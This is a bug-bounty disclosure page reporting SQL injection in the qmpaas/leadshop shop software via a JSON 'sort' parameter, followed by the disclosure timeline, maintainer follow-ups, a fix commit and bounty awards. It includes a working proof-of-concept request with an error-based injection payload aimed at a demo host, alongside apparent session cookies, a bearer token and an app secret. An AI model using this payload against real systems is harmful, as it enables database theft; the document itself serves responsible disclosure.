SQL injection at exportUsers function in qmpaas/leadshop


Reported on

May 26th 2022


SQL injection at exportUsers function via sort query parameter

Proof of Concept

GET /index.php?q=/api/leadmall/statistical&behavior=exportGoods&sort={"updatexml(rand(),concat(CHAR(126),version(),CHAR(126)),null)--+-":"asd"} HTTP/1.1
Host: demo.leadshop.vip
Cookie: _csrf=fefe3c31fa6dbee72cd8e6a1e3b010398cfeed682f0198b879af18dbd5d5e5c8a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22SQDJuf-G631HB3SFwAjpH8ZW9XfM-nci%22%3B%7D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: application/json, text/plain, */*
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiIsImp0aSI6Ijk4YzA4YzI1ZjgxMzZkNTkwYyJ9.eyJpc3MiOiJodHRwOlwvXC9kZW1vLmxlYWRzaG9wLnZpcCIsImF1ZCI6Imh0dHBzOlwvXC9kZW1vLmxlYWRzaG9wLnZpcCIsImp0aSI6Ijk4YzA4YzI1ZjgxMzZkNTkwYyIsImlhdCI6MTY1MzU4MzAxNiwiZXhwIjoxNjU2MTc1MDE2LCJpZCI6MX0.O11reWZxDohDWiW9eqeTK0mvvxVy_xwwM4h7g5lwjXs
Qm-App-Type: undefined
Qm-App-Id: 98c08c25f8136d590c
Qm-App-Secret: 3AYpU16dZ1CY7ejqvrE39B351vanLJVD
Origin: https://demo.leadshop.vip
Referer: https://demo.leadshop.vip/index.php?r=admin%2Findex
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Pwnfox-Color: red
Te: trailers
Connection: close

Poc Image



An attacker can modify the query and can retrieve all data in database.

We are processing your report and will contact the qmpaas/leadshop team within 24 hours. 2 years ago
A GitHub Issue asking the maintainers to create a SECURITY.md exists 2 years ago
We have contacted a member of the qmpaas/leadshop team and are waiting to hear back 2 years ago
We have sent a follow up to the qmpaas/leadshop team. We will try again in 7 days. 2 years ago
2 years ago


Hi @maintainer,

Can you review my report?

We have sent a second follow up to the qmpaas/leadshop team. We will try again in 10 days. a year ago
a year ago


Hi @admin, any update here?

Jamie Slome
a year ago


No update. Let's wait for the remaining notifications to go out to the maintainer. Once the final notification has been sent, feel free to get in touch again, and I will reach out to the maintainers on your behalf 👍

We have sent a third and final follow up to the qmpaas/leadshop team. This report is now considered stale. a year ago
a year ago


Hi @admin, look like Maintainer fixed at https://github.com/qmpaas/leadshop/commit/44dba1c86b7b2cfcd4594a25335f8628b650d37e#diff-2f55bd65e7f3d17890b89a77f76ee040e12d09519ff5668c12ffefc40ecdb2cc

leadshop开源商城 validated this vulnerability a year ago
Nhien.IT has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
leadshop开源商城 marked this as fixed in 1.4.10 with commit 44dba1 a year ago
leadshop开源商城 has been awarded the fix bounty
This vulnerability will not receive a CVE
a year ago


@admin can we assign a CVE to this vulnerability?

Jamie Slome
a year ago


We can, as long as the maintainer is happy to assign and publish one for this report.


to join this conversation